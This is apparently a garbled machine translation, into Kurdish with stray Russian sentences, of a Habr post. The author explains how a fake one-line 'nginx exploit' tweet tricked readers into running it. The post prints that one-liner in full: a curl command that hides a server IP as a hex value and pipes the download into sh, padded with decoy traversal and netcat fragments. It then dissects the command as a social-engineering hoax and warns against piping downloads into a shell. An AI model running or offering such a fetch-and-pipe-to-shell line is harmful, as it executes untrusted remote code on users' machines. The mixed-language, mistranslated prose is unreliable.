Not. werger.:
TL;DR: Di bin tu şert û mercan de pîvazkirina pelan li sh an bash bikar neynin. Ev rêgezek girîng e ku meriv kontrola komputera xwe winda bike.
Ez dixwazim bi we re kurteçîrokek li ser îstîsmarek PoC ya komîk a ku di 31ê Gulanê de hate afirandin bi we re parve bikim. Он появился оперативно в ответ на новость от
Piştî ku min xebata li ser teknîkek nû ya berbelavkirinê di curl de qedand, min tweeta orîjînal vegot û "PoCek xebitî" ya ku ji yek rêzek kodê pêk tê ku qaşo qelsiya keşifkirî îstîsmar dike, derxist. Bê guman, ev bi tevahî bêaqil bû. Min texmîn kir ku ez ê tavilê eşkere bibim, û ya herî baş ez ê çend retweetan bistînim (oh baş).
Lêbelê, min nikarî xeyal bikim ku paşê çi bû. Popularîteya tweeta min pir zêde bû. Ecêb e, di vê gavê de (15:00 bi dema Moskowê 1ê Hezîranê) hindik kesan fêm kir ku ev derewîn e. Pir kes bêyî kontrolkirina wê ji nû ve tweet dikin (bihêlin ku heyranê grafîkên ASCII yên delal ên ku ew derdixe).
Tenê binêrin ka ew çiqas xweşik e!
Digel ku hemî van lûf û reng pir mezin in, diyar e ku mirov neçar bû ku kodê li ser makîneya xwe bimeşînin da ku wan bibînin. Xwezî, gerok bi heman rengî dixebitin, û digel vê yekê ku min bi rastî nexwest têkevim tengasiyek qanûnî, koda ku di malpera min de hatî veşartin tenê bangên echo dikir bêyî ku hewl bide ku kodek zêde saz bike an bicîh bike.
Danûstandinek piçûk:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Endezyariya sosyo-elektronîkî (SEE) - ji tenê phishing wêdetir
Ewlehî û nasîn beşek sereke ya vê ceribandinê bû. Думаю, именно они привели к его успеху. Xeta fermanê bi zelalî bi referansa "127.0.0.1" (hostê herêmî yê naskirî) ewlehiyê vedibêje. Localhost ewledar tê hesibandin û daneyên li ser wê qet ji komputera we dernakeve.
Nasname duyemîn pêkhateya sereke ya SEE ya ceribandinê bû. Ji ber ku temaşevanên armanc di serî de ji kesên ku bi bingehên ewlehiya komputerê nas dikin pêk dihat, girîng bû ku kod were afirandin da ku beşên wê nas û nas xuya bikin (û ji ber vê yekê ewledar). Deynkirina hêmanên têgînên îstîsmarê yên kevin û berhevkirina wan bi rengekî neasayî gelek serketî ye.
Li jêr analîzek hûrgulî ya yek-liner e. Her tişt li ser vê navnîşê li xwe dike xwezaya kozmetîkî, û bi pratîkî tiştek ji bo xebata wê ya rastîn hewce nake.
Çi hêmanên bi rastî hewce ne? Ev -gsS
, -O 0x0238f06a
, |sh
и сам веб-сервер. Pêşkêşkara malperê ti rêwerzên xerab tune, lê bi tenê grafikên ASCII bi karanîna fermanan re xizmet kir echo
di senaryoya ku tê de heye index.html
. Dema ku bikarhêner ketin rêzek bi |sh
di navîn de, index.html
barkirin û kirin. Xweşbextane, parêzgerên servera malperê niyeta nexweş tune bûn.
-
../../../%00
- nîşan dide ku ji pelrêçê wêdetir diçin; -
ngx_stream_module.so
- riya berbi modulek NGINX-a rasthatî; -
/bin/sh%00<'protocol:TCP'
- Qaşo em dest pê dikin/bin/sh
li ser makîneya armancê û beralîkirina encam berbi kanala TCP; -
-O 0x0238f06a#PLToffset
- malzemeya veşartî, pêvekirî#PLToffset
, ji bo ku di PLT-ê de bi rengek hûrgelek bîranînê xuya bike; -
|sh;
— еще один важный фрагмент. Ji bo ku em koda ku ji servera malperê ya êrîşkar a ku li cîhê ye, bicîh bikin, hewce bû ku em derketinê ber bi sh/bash ve rêve bikin.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummyek ku tê de netcat behs dike/dev/tcp/localhost
da ku her tişt dîsa ewle xuya dike. Di rastiyê de, ew tiştek nake û ji bo bedewiyê di rêzê de ye.
Ev yek deşîfrekirina skrîpta yek-xêz û nîqaşa aliyên "endezyariya sosyo-elektronîkî" (phishing tevlihev) bi dawî dike.
Veavakirina Pêşkêşkara Webê û tedbîrên dijber
Ji ber ku piraniya aboneyên min infosec/hacker in, min biryar da ku ez servera malperê li hember îfadeyên "berjewendiyê" yên ji hêla wan ve hinekî berxwedêrtir bikim, tenê ji bo ku mêran tiştekî bikin (û ew ê xweş be damezirandin). Ez ê li vir hemî xeletiyan navnîş nekim ji ber ku ceribandin hîn jî berdewam e, lê li vir çend tişt hene ku server dike:
- Bi aktîvî hewildanên belavkirinê yên li ser hin torên civakî dişopîne û piçûkên pêşdîtinê yên cihêreng diguhezîne da ku bikarhêner teşwîq bike ku li ser zencîreyê bitikîne.
- Chrome/Mozilla/Safari/hwd li şûna ku skrîpta şêlê nîşan bide, beralî dike vîdyoya danasînê ya Thugcrowd.
- Li nîşanên EWŞYAR ên destdirêjî/hakkirina eşkere temaşe dike, û dûv re dest bi veguheztina daxwazan ber bi serverên NSA (ha!) dike.
- Trojanek û her weha rootkitek BIOS-ê li ser hemî komputerên ku bikarhênerên wan ji gerokek birêkûpêk serdana mêvandar dikin saz dike (tenê henek dike!).
Parçeyek piçûk a antîmeran
Di vê rewşê de, mebesta min tenê ew bû ku ez hin taybetmendiyên Apache-ê - nemaze, qaîdeyên xweş ên ji bo veguheztina daxwazan serdest bikim - û ez fikirîm: çima na?
NGINX Exploit (Rast!)
Bibin abone
Source: www.habr.com